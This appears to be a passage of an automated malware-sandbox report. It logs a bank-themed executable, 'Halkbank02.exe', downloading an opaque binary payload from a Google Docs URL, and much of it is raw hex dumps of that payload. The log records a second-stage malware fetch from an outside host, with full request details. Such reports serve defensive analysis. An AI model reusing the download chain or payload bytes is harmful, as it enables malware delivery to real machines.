                                                                              2021-09-15 08:52:38 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 63 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 70 65 71 6c
                                                                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0g-c0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql
                                                                              2021-09-15 08:52:38 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.349825172.217.168.65443C:\Users\user\Desktop\Halkbank02.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2021-09-15 08:52:38 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                              Cache-Control: no-cache
                                                                              Host: doc-0g-c0-docs.googleusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2021-09-15 08:52:38 UTC2INHTTP/1.1 200 OK
                                                                              X-GUploader-UploadID: ADPycdutBro-dwwksg0NhNmx6Wem3dcspojZcgMKgm1YG3-tjiuA32LiDfG6VdESaLlqvpkDH5abEZBQz3PGTt5VFlj-nRuE0g
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                              Content-Type: application/octet-stream
                                                                              Content-Disposition: attachment;filename="panel1_kCwkdGxFIE40.bin";filename*=UTF-8''panel1_kCwkdGxFIE40.bin
                                                                              Date: Wed, 15 Sep 2021 08:52:38 GMT
                                                                              Expires: Wed, 15 Sep 2021 08:52:38 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=KbaelA==
                                                                              Content-Length: 115264
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                              Connection: close
                                                                              2021-09-15 08:52:38 UTC5INData Raw: ae 94 a5 55 15 5c 46 fb 17 00 94 82 90 e6 bb 7f 66 75 b7 7a 8e 88 11 54 e7 1e 23 2f 43 2f 43 88 af 58 4b 74 a8 83 1e 6f cf 9e 0f 4f 33 a9 36 9c 2b 18 a2 54 e4 3c 09 c2 f3 bb 0f 41 56 85 6a eb e0 8e 4e bd 93 65 4d 71 e2 8c 68 91 ce 9f 90 c6 b9 8d cc 65 d1 ee e9 06 6b 20 49 b9 ed b2 4d 58 34 ab 2e 8d 66 3a 99 eb 09 6f 41 4d 1c 83 b2 14 9c 90 ec a7 90 49 0d 07 9d fc 75 92 d9 91 22 d9 98 07 46 62 bc e0 4c a7 10 04 09 95 e4 56 bc bd a9 82 d7 65 6b 79 be 89 5d 30 bc 3f 22 6b 74 f9 d0 ad d5 77 c6 ac 22 af f6 e3 20 73 9f 2b 4c 9f 0e 27 ee fa ad 39 e8 e6 cb f1 d2 55 d5 71 df ee d8 ab 50 70 55 d2 62 89 84 a3 9e ed 12 02 25 96 69 e8 28 b3 c5 2e 8b a5 ac 51 de 58 66 ca de 43 b8 15 3f 34 fc 21 6c 7b f9 4a 33 01 9a 83 4d e6 75 64 f1 ab e5 5a 98 83 bf e1 f3 0a 6a f5 03
                                                                              Data Ascii: U\FfuzT#/C/CXKtoO36+T<AVjNeMqhek IMX4.f:oAMIu"FbLVeky]0?"ktw" s+L'9UqPpUb%i(.QXfC?4!l{J3MudZj
                                                                              2021-09-15 08:52:38 UTC9INData Raw: f5 23 ea c3 77 f7 c9 b6 35 5b 9f 78 f4 ff 3a 68 e8 e4 2b 4a e9 37 e9 c0 c7 25 38 3e 6b cd b9 63 12 5c b1 41 8d 20 0c 66 bd fc 68 c6 60 18 4f 56 e7 30 e3 e2 d4 10 f4 57 14 6f 4b f2 99 50 50 7c 16 51 0f fc 0a 67 e3 68 12 6f 06 f3 00 e3 6a 63 3c 96 f8 e2 84 5b 51 ef a0 db 1f 5e 42 3c ef c4 b7 32 80 48 fd c9 ad dc 59 d3 e4 e2 1e a3 7d 16 10 69 86 04 bc e1 39 b9 c1 29 0a e1 f7 6e c2 9a 4f 33 f3 ef 50 f2 c7 83 37 ec fb a3 2b eb b2 f6 be ab 5e 5d 64 aa 02 28 ce 10 37 03 b0 87 f6 90 fe 3a a5 4d 60 49 03 79 61 7d ec fe a3 f5 33 66 f3 b0 f3 b4 2c 45 f4 53 24 88 9a 57 8b 03 dd 4a df 6f 1d 5c a5 8e 94 dc d6 d5 e6 df 31 fe 7b e2 b8 15 13 09 a9 18 27 43 dc fb 94 c2 64 74 a9 75 e3 c4 1a ad 7d ff 81 bb d6 6c c2 0c 1f 9b b9 0a d8 53 f1 91 fe bf 68 c2 15 8b 1b 6b 13 57 80
                                                                              Data Ascii: #w5[x:h+J7%8>kc\A fh`OV0WoKPP|Qghojc<[Q^B<2HY}i9)nO3P7+^]d(7:M`Iya}3f,ES$WJo\1{'Cdtu}lShkW
                                                                              2021-09-15 08:52:38 UTC12INData Raw: 54 d8 81 27 cb d5 1e 92 2f 53 57 30 6c e3 07 d7 2c a0 67 73 05 e0 c2 88 f3 f7 01 ee 4e b8 74 30 49 96 07 c9 39 7b 16 0c 34 45 d2 11 b7 db 94 c5 f1 11 d2 93 d9 d8 68 8c fb d8 fe 29 24 3d d6 3f af a7 cd e8 1e aa 4e d3 d1 10 46 25 06 52 8c 0a 27 d7 0a ad ee ad da 66 da a0 77 07 b7 0c 85 00 44 7c d1 27 d7 60 eb 81 11 2d 09 38 22 83 c5 60 5d 45 f2 f0 23 70 fc 2e 0b b9 01 b8 52 d0 e7 5f 49 98 cf 25 fe 98 fa 30 ef c8 e3 96 fd 4d 99 37 1b fc 2b 99 d5 4a 22 b0 e2 98 84 20 60 d2 1e e2 75 c9 f1 b7 8b 3a bd 85 a2 d6 37 22 93 3b 64 a4 25 f1 1f 90 ab f6 bb bc 2e b8 b3 9c 37 62 17 b5 dc 15 5e 3e 60 79 fd 88 56 7a 54 ab 34 5b 79 b5 ae 47 b1 7b 45 67 a0 e7 41 73 9f 37 62 5f ca c2 1f be 3d 57 ab 68 d8 23 e8 47 95 bb bd bd ec e3 c8 9d a4 a4 61 27 67 77 a9 e8 15 92 fe fc d3
                                                                              Data Ascii: T'/SW0l,gsNt0I9{4Eh)$=?NF%R'fwD|'`-8"`]E#p.R_I%0M7+J" `u:7";d%.7b^>`yVzT4[yG{EgAs7b_=Wh#Ga'gw
                                                                              2021-09-15 08:52:38 UTC16INData Raw: 0e 6f ca aa ee a2 fd f9 88 52 4c 65 49 ed 19 57 6c 9e 88 cd 8d 9c 3a 0c e7 24 0d 49 b7 c8 f2 63 47 94 c3 a1 83 3f d5 d0 77 2b 99 ab 00 98 74 09 9d 76 d9 61 9a ed 82 57 ae 7a 3b b8 a3 f6 cd 7e da cf ac f0 76 9d 27 ca 8e ab 5d cf c0 cb a1 e3 68 7b 69 19 65 56 cf 02 89 e2 85 9b 0e fb 66 9e 64 08 4e 68 e7 2e e1 0d 86 61 4d 1b 6e f3 de 77 49 01 14 fe 57 a6 76 7e 0d 9c 54 7b 0d 40 51 56 19 55 9a ac e0 38 cd 0d 8c ad c2 fb c3 50 4d 99 94 ac 1d 33 82 5a f9 09 2c 5f a4 dc 7d 0c bc cf 97 be 29 e5 ca 66 7b 2b b5 e1 cf 51 1a 32 f8 d1 fd fa 0c 36 17 af 15 d9 f3 3d 1b 4b 0a 08 cc 25 ec 4f ac eb 08 2a ef 5f 7c 58 96 0f 91 59 ce 59 1a fd 2a 64 53 bc b9 78 2e b5 b2 ef f7 d4 47 74 2a 36 41 26 a0 eb 90 60 e0 16 ba af 26 3e 1a 65 68 4c e6 ac 4c 40 93 4d 87 62 d0 ab 32 4c 0e
                                                                              Data Ascii: oRLeIWl:$IcG?w+tvaWz;~v']h{ieVfdNh.aMnwIWv~T{@QVU8PM3Z,_})f{+Q26=K%O*_|XYY*dSx.Gt*6A&`&>ehLL@Mb2L
                                                                              2021-09-15 08:52:38 UTC18INData Raw: 49 05 f9 e4 36 8d eb ee f4 cf 5c 0b f8 32 7c 44 d2 d1 01 76 49 7c e5 4e 55 40 04 25 0d 18 b3 9c 44 4c 2c e5 66 a1 e4 f0 9b f0 e1 50 c6 ec c5 84 18 15 0d 48 9b f7 dd 1a 62 52 73 07 40 6f 29 7d 08 40 7f 1c e0 15 87 9b 34 e3 e2 89 61 19 6e 5a f7 20 3b d8 7a 03 97 52 13 a1 3e ec 56 a0 3e e3 fd ee 2c 87 48 75 1c e3 41 21 e2 3a 51 c6 dc 9a ed e6 20 fa b0 6c a6 e5 1c 4d 37 62 26 92 6c c1 fe 65 91 37 82 c8 35 a9 31 c6 8f d9 51 b5 aa 96 b0 01 ac aa 85 99 f2 3b 92 ac 1d de 6b 6b 37 6c 4f 2e 52 d5 a5 1d 82 6d 2f 6c c9 47 a4 02 4e 90 ef a5 e8 0b 73 96 18 de ec b2 7f 9b fb 1b 77 22 e4 bd 42 fa c4 f2 e4 26 4a 13 1b 00 46 6f 29 b8 f8 d3 91 4d d6 d9 55 ae d2 f3 f6 37 61 93 7f 63 04 e8 17 11 68 2f 9b 65 5c 07 13 45 6c 7c 1e 76 01 e7 a3 e6 c8 ad 47 ee b4 42 fd 7f 06 5d 3d
                                                                              Data Ascii: I6\2|DvI|NU@%DL,fPHbRs@o)}@4anZ ;zR>V>,HuA!:Q lM7b&le751Q;kk7lO.Rm/lGNsw"B&JFo)MU7ach/e\El|vGB]=
                                                                              2021-09-15 08:52:38 UTC19INData Raw: dd bb 95 06 01 8a 27 74 b6 9b 3e a1 5d 29 c3 64 b1 e8 13 c8 6c c8 67 c0 17 20 8d c1 33 2e 22 74 d2 55 d5 f2 26 ef 51 73 2f 77 bd 22 9a 76 7b 48 e9 64 d8 ea da 6e 96 17 c3 dd 4c f6 08 66 bc b9 b9 a7 99 35 91 3c 4b fe 60 61 75 f4 e7 2f d7 40 ba d9 99 df 63 e4 fe 28 df ad 6e 48 70 e1 40 1e 0c 45 15 1d 5e 7c 73 47 6c e1 bf 2b b4 a2 c5 17 81 d9 f0 7f 73 9e 54 33 72 b0 71 95 64 51 06 0b 2b b7 69 31 8e 17 3d bb bc a3 4e 01 e2 8b 6b 4a d9 1c 26 9d 98 d6 f0 f8 36 f8 8a af 57 09 36 41 6d 29 92 ee 91 de 33 75 ce ab 28 5a d6 0b c8 b5 2a ed 2e 9f 78 71 4b 48 7e ce 30 c1 52 b0 90 d0 c0 47 a5 c0 81 94 8e d7 00 85 48 38 82 70 fc 55 12 f2 fc 69 a3 c9 e7 ba 22 e0 78 17 63 5f b7 df f1 60 df 8c 32 29 3b 5b f5 3f 8b a4 a0 13 dc a0 8f ed 56 cc b4 71 61 f6 b8 2a 95 e7 62 bb 10
                                                                              Data Ascii: 't>])dlg 3."tU&Qs/w"v{HdnLf5<K`au/@c(nHp@E^|sGl+sT3rqdQ+i1=NkJ&6W6Am)3u(Z*.xqKH~0RGH8pUi"xc_`2);[?Vqa*b
                                                                              2021-09-15 08:52:38 UTC20INData Raw: 79 21 2c 2c 53 6f 75 54 45 ba 81 26 1b a9 1b 4d ed 6d aa e6 47 b7 02 17 89 ef a5 9c 80 84 10 e0 2c 38 7c c7 36 e7 ac e8 9e 90 a7 94 3c e4 79 67 4d 15 ca e0 17 75 cb 8b 18 65 18 d9 16 05 42 71 14 c6 c2 36 bc 2d 07 9f 19 84 64 61 35 79 5a 19 21 67 5c b1 ac f8 d5 f0 8f d4 bc 11 63 07 79 af e2 8f b3 3a 80 1e 3e 35 54 a4 ce 12 88 33 1b 0b c8 3e b0 74 c9 9f 2a 19 46 ed 32 f0 d3 0b 7a ab a5 3a b5 41 8e fc d9 41 5b fd bb 18 0b 9b 70 af 3d e1 fc fd 57 9b 37 1b 65 20 46 94 98 2f e1 89 5a 84 02 1b 25 d5 00 8f 9d c4 f2 90 c5 44 8d 2e 2a ef 2e c0 8b f8 2d bc 5e 6f d9 28 bd f6 0a d8 27 a0 9a c0 9b 20 f6 4b 79 bb f5 c6 7a ed 41 ec 16 e7 81 ca 36 cf 4a f8 31 06 29 7b 1e 61 c8 3d 64 8f b6 f8 fc c2 11 c1 59 b7 b2 72 ef 61 87 d4 92 e8 9a 43 ad 5d 5b 45 12 18 b5 71 93 4b 38
                                                                              Data Ascii: y!,,SouTE&MmG,8|6<ygMueBq6-da5yZ!g\cy:>5T3>t*F2z:AA[p=W7e F/Z%D.*.-^o(' KyzA6J1){a=dYraC][EqK8
                                                                              2021-09-15 08:52:38 UTC22INData Raw: 3c 86 78 5e 44 5c 56 e8 27 35 99 90 87 4a 11 24 ed 55 0a 8c 27 ea 80 08 36 71 7a 66 da 0e 7d f8 4a 29 1e 65 71 10 b0 53 60 3b 8f dc d9 bd 94 b2 6c d0 2c e2 4e e2 51 ef 25 d2 93 b2 80 c4 76 10 4f 41 fa 7a d9 5c 77 50 e2 e1 eb 78 ab df 17 ba f3 5c 3d cb 54 62 59 cb fd 15 c3 e8 47 78 b5 29 6c 73 38 a7 79 52 03 1a b9 e6 0b 20 6b d5 da ee 9d 1c 94 f2 23 a7 75 b3 6f c3 4e be fa 64 e2 df 1f 41 17 d1 84 04 e4 e1 39 b9 51 63 33 f4 7f a9 e9 1d 56 4a cb ec e0 f3 67 e2 7e af 70 56 e6 d2 0c 09 8d 6b 65 e8 ef 21 48 c2 46 a5 cc a7 28 cf 7b 59 fc e6 7e a5 08 4a db 51 a4 bb b9 ee 01 4b 03 e9 6a 1b 46 b9 4f 42 c7 54 14 02 cc 35 13 15 42 d1 a5 22 aa 0c 63 0c 7d 1f df ed 1c 84 0c e2 b8 6a 78 96 3e 62 bd d2 e5 81 8f fd 94 e4 d4 5d f8 90 02 88 d9 57 09 7c be 18 5c 4b 3d 09 c3
                                                                              Data Ascii: <x^D\V'5J$U'6qzf}J)eqS`;l,NQ%vOAz\wPx\=TbYGx)ls8yR k#uoNdA9Qc3VJg~pVke!HF({Y~JQKjFOBT5B"c}jx>b]W|\K=
                                                                              2021-09-15 08:52:38 UTC23INData Raw: e4 3f f3 da 94 93 ac 71 e4 68 05 f9 14 59 51 fc ed 78 42 b3 c5 a6 81 fa 15 2d 37 6d ff c4 fc d1 90 36 5d 64 a3 61 4f 1a 5c b9 a7 65 3f e7 ef de c5 ef ff 42 b5 ba d3 e7 85 16 e7 b1 29 3d 65 81 bd 40 bc 86 97 bb 43 6d 9b fe 02 13 35 e8 37 13 a5 e3 16 16 c3 f5 45 2d a0 f5 2e a6 38 fe 82 49 34 dc 91 c4 24 1e 05 22 6d ba 25 6c 2e 0b 6a 33 9a 5a ab 11 ee 29 c7 ac 46 66 f7 b9 b0 ce 4d d1 72 ed 7f 89 03 fb 89 be b2 97 c6 be fc 76 76 13 58 1b 0c 05 ef 7f 1a 8a 6d 66 f4 e4 98 22 24 86 39 cb 47 11 2a 31 d8 f7 e9 4d fe 0c a6 fa 02 2e e5 b4 f6 84 63 fa 3e af 12 8b 43 f1 b9 7f 00 83 49 6d d9 dc c5 26 1d 1b eb 12 50 8a 37 98 3c 89 43 a7 b8 88 21 cf 7a 87 ad 3d 88 3a 11 27 de 14 fb 52 59 26 79 8c 28 cb 19 fa eb c0 69 96 9d 1c 38 c2 a5 cf 55 a0 da 8b 48 8e 13 3b bc 47 60
                                                                              Data Ascii: ?qhYQxB-7m6]daO\e?B)=e@Cm57E-.8I4$"m%l.j3Z)FfMrvvXmf"$9G*1M.c>CIm&P7<C!z=:'RY&y(i8UH;G`
                                                                              2021-09-15 08:52:38 UTC24INData Raw: 90 58 84 8f ee 18 c6 7c 6d f3 7d 34 af 3d c0 18 55 74 89 e7 86 72 58 1b 84 ad 59 fc 38 f6 19 d3 dd 79 c6 9e 55 5d 28 24 b4 5b 15 b8 7b b9 37 14 d4 6e 11 d0 3d 69 cf e2 b7 8a c1 a5 5e bc 0c 63 44 97 f9 d6 21 14 90 0b 1c d7 27 f9 15 7b f2 20 d3 e5 0b 4f f8 f7 29 10 62 52 5b 4f 03 d8 57 05 63 d5 3c d5 e0 c1 5c 77 1f 9f 1d 9e f1 45 57 e4 7c 83 c8 4a b7 17 6b da 86 a1 e6 f2 56 a0 16 5f 1f 24 fb 07 f7 d4 a3 1c 90 7f ed 8c e1 f3 b3 36 18 0d b3 38 74 fc 23 f5 78 49 37 8b ff 7e 91 bc c4 72 4f 08 bb 76 be 19 a6 de eb dd 32 c4 05 81 88 7c a3 d0 fd 28 30 ff 64 b0 04 0f 2f 75 54 03 e2 39 18 a8 a2 69 ea a6 20 a6 1e a4 55 b6 df 77 9b 59 33 2d d3 a9 6a 35 10 f5 fd fe ff 9b fa 99 5b 42 42 fd b0 91 a2 38 ee 11 47 2f d9 74 74 8f ce d4 12 1e 0b 88 55 cf 7e 34 c9 43 8e d3 a9
                                                                              Data Ascii: X|m}4=UtrXY8yU]($[{7n=i^cD!'{ O)bR[OWc<\wEW|JkV_$68t#xI7~rOv2|(0d/uT9i UwY3-j5[BB8G/ttU~4C
                                                                              2021-09-15 08:52:38 UTC25INData Raw: 19 fd bb f1 4e 94 47 7a 29 1e da 07 31 0b 45 c9 7b 9c 51 77 2c 2d fd a9 cc 73 2a 7d a9 b2 55 2d b1 3a 67 6a 71 b9 96 de d9 73 96 ad 3f ae a2 96 4e 17 fa 09 1e a7 04 2c ae bb 93 01 8a b8 b9 82 a6 02 d5 21 ad 81 bb ce 23 03 66 e0 2c ec fc d7 c9 ed 12 45 40 e2 24 87 4c c6 a9 4b cd cc c0 34 90 39 0b af 89 43 b8 46 5a 40 b8 4d 00 3f 90 38 56 62 ee ec 3f 9f 22 64 f1 ab e5 1d fd f7 f3 8e 90 6b 06 90 4a f9 54 7d a4 34 36 b4 d2 8a a7 7a 6b 4a 74 2b e5 0c ce 7c 0d 40 2c 39 2a ac 8a e1 85 d6 db 46 e6 72 74 9a a5 3f d7 70 0a 27 8b d7 34 df 22 27 46 bf 9f 8e 1c c3 12 36 39 35 1c 75 47 e0 c7 07 3e 3c cc ce f4 99 16 76 70 c6 61 5a 72 ae 9e 99 1d 05 73 20 e6 b2 47 10 7f f4 21 09 a6 ca 67 56 0c 02 23 e3 25 93 1d f6 24 8d 6e 16 bb 0e d8 3c 57 c5 8a f1 a9 8f 84 65 d1 b1 99
                                                                              Data Ascii: NGz)1E{Qw,-s*}U-:gjqs?N,!#f,E@$LK49CFZ@M?8Vb?"dkJT}46zkJt+|@,9*Frt?p'4"'F695uG><vpaZrs G!gV#%$n<We
                                                                              2021-09-15 08:52:38 UTC27INData Raw: 72 b1 14 4c 01 f2 62 c3 93 b2 d8 14 41 38 cb 35 34 46 6a b7 05 46 38 de 2c b7 62 48 f7 a1 13 c5 7e 31 b0 d8 32 2f 75 bb ff 82 b5 24 7e d6 d3 b5 86 e8 31 e1 33 ea 1a 14 32 e8 b2 67 13 8f a0 10 3c c7 3d be 7f 8a f7 85 1e f0 03 4d 25 95 55 be 9b e5 65 a1 03 f7 a0 75 e7 a6 03 07 ea 0d ce f9 cf cb 11 c9 43 a0 52 9f 6d 88 64 fc 6d 28 d3 d1 9b fb 26 76 e8 8b 69 55 5a ae 91 0f 47 3d 0e d8 32 be 4c 78 f7 e4 fb 8b 51 a4 ba 49 53 fb a9 5a 4c a5 c6 3c 62 ef 8b 0a cd 78 f2 d2 1d 0b 8a 54 e7 2a 25 49 05 17 ea 57 97 c8 31 e9 b0 22 72 a6 9c f9 8f f0 a9 a7 58 b1 b4 94 9e d7 95 65 34 f0 11 b5 fa 03 b1 42 07 b3 23 44 a7 ad 20 ca 4e ea b6 43 48 f3 8b 9d e2 c6 f9 9a 64 c0 57 66 0d a4 df 98 e4 93 18 12 36 1e 11 8b f0 7a 75 3f f2 cd 8d ef 50 cb 2e 16 a4 be 14 72 b1 be cc ac 19
                                                                              Data Ascii: rLbA854FjF8,bH~12/u$~132g<=M%UeuCRmdm(&viUZG=2LxQISZL<bxT*%IW1"rXe4B#D NCHdWf6zu?P.r
                                                                              2021-09-15 08:52:38 UTC28INData Raw: 83 f2 ab 2b f5 8c 30 b2 5d 17 4c 00 ed 8c 15 3d f4 98 93 f6 4c 03 97 84 f8 5a b7 f6 13 63 d2 18 07 9e 78 84 14 b4 5f 80 e5 ca 12 48 34 fe b5 c8 ae 14 2e 07 22 41 68 c0 d1 e8 06 ce 21 ab f4 ff 3b 87 58 18 55 13 c5 57 53 10 44 36 92 7f 9d 95 9f 96 5b 19 95 c2 c5 0e 65 c9 b8 fd 32 75 76 a6 c3 fe e0 f3 10 97 84 8a 48 c3 8e e3 fb 1b e8 2e 35 0e 93 ef 38 92 fb 1a bc 01 7e a9 47 f3 75 b9 6a eb b3 dc 57 f2 25 5a 51 8c d5 0a 6b e9 a2 3d e9 3b 58 b6 40 43 c9 79 ac 13 52 31 6d 9b f5 30 69 ea 2e cb 47 a5 b0 21 78 b9 f2 83 83 86 7f a8 29 be ca fc 8a ec d3 4b c4 74 ce da 70 be 27 78 78 1a 66 ac 83 22 1d 23 ce d6 ca 05 cf b0 6a d6 09 e6 cf 73 a0 21 90 ed ce 39 05 09 c9 8a ec 94 b8 4b 0b ab 6d 43 e8 0f d3 a8 9f 7e f1 2c 4a 99 a8 18 32 11 62 8c 17 f7 1f ec c2 fa a0 b9 0b
                                                                              Data Ascii: +0]L=LZcx_H4."Ah!;XUWSD6[e2uvH.58~GujW%ZQk=;X@CyR1m0i.G!x)Ktp'xxf"#js!9KmC~,J2b
                                                                              2021-09-15 08:52:38 UTC29INData Raw: 1e fd 0a f4 19 fa fb f4 51 5c c3 30 9a fa ae 66 cb c5 8e 8b ee d0 9c 05 8d 5c 6b fb ea c7 a4 92 bd 66 1c 46 94 ab 53 1a 4c 9a 7d 43 1b 32 a0 31 b3 ef 09 b7 39 a6 85 c7 15 2d 7f 91 54 c1 42 2e f6 9a 80 c6 73 bf 56 af 98 5a 58 65 4b 5d ec 32 1e 11 00 75 e3 4a 88 be dc 72 6e f2 c0 af cf 3c 42 32 72 a2 b8 69 85 96 64 3c eb 3f 63 d4 72 88 39 fc 48 a5 b9 78 79 87 41 19 20 26 ec a9 84 74 bd f9 7c 4d 73 e6 e6 67 fb 31 0a 90 ae 75 e1 8c 65 b9 ec e9 06 ab 81 c7 08 ac b2 c6 58 cb 7b ab 4d 13 78 14 af 2d 6b 11 c0 58 a7 be 44 f6 90 86 a7 f8 99 61 47 9d 77 31 b6 cd c0 83 41 91 56 46 e7 a3 ab 95 ef f1 c9 18 52 ea fa 78 09 f5 53 be 17 4b 09 24 f1 eb bd 22 d9 06 22 51 2b 58 3c f6 12 6d de a8 11 57 52 46 15 fa 59 37 0b 67 49 df c8 a0 33 f3 d1 cb f1 81 55 9a 71 99 ee 8c ab
                                                                              Data Ascii: Q\0f\kfFSL}C219-TB.sVZXeK]2uJrn<B2rid<?cr9HxyA &t|Msg1ueX{Mx-kXDaGw1AVFRxSK$""Q+X<mWRFY7gI3Uq
                                                                              2021-09-15 08:52:38 UTC31INData Raw: ad 31 f2 c5 b3 70 58 48 ab 50 94 15 6c 7a 5a 4f 74 2e 8a 3b 72 ce 49 f4 68 a2 66 f9 3a df 84 2a 43 84 42 aa 11 40 da ae 0d 7e 63 cb 01 2a 56 64 69 63 9b ff bf cc d5 e6 f0 08 e6 03 3e b0 b5 d3 0d 42 c6 9e 7d 3f 65 30 48 db b8 28 c4 46 8f d7 de df 0d 43 4b 86 04 4a 00 8b c1 40 ab 1b a4 87 05 6b 56 fd fb 61 d1 0b 40 90 11 e6 4e 98 df 26 50 6e 40 19 23 f3 8b 23 69 fe cb 2d 4c cc a3 e4 c6 72 f1 90 97 2a 3d 4f ef 97 d1 a1 07 99 fc d4 3c eb 5c ee c7 73 69 f9 5b 0c ef 8f fc a3 5d a3 1f 9a 04 e4 b2 7c 6e 49 e3 94 f8 dc f5 fa cf b4 43 b1 00 7d ff 4c c4 ab 0b 92 8f 48 f5 cf 11 2e b2 9d 84 bc 0c 77 be fc ff 76 43 5d 7a 38 aa e4 0a 76 b4 5f 94 13 09 7d 8d d6 92 ac 90 9e 37 8b 71 8a 26 bb 00 55 d9 3b 6d 0b 9d 08 95 b9 16 3a e4 d3 36 3d f9 1a 69 47 f6 c5 d3 03 30 0c 49
                                                                              Data Ascii: 1pXHPlzZOt.;rIhf:*CB@~c*Vdic>B}?e0H(FCKJ@kVa@N&Pn@##i-Lr*=O<\si[]|nIC}LH.wvC]z8v_}7q&U;m:6=iG0I
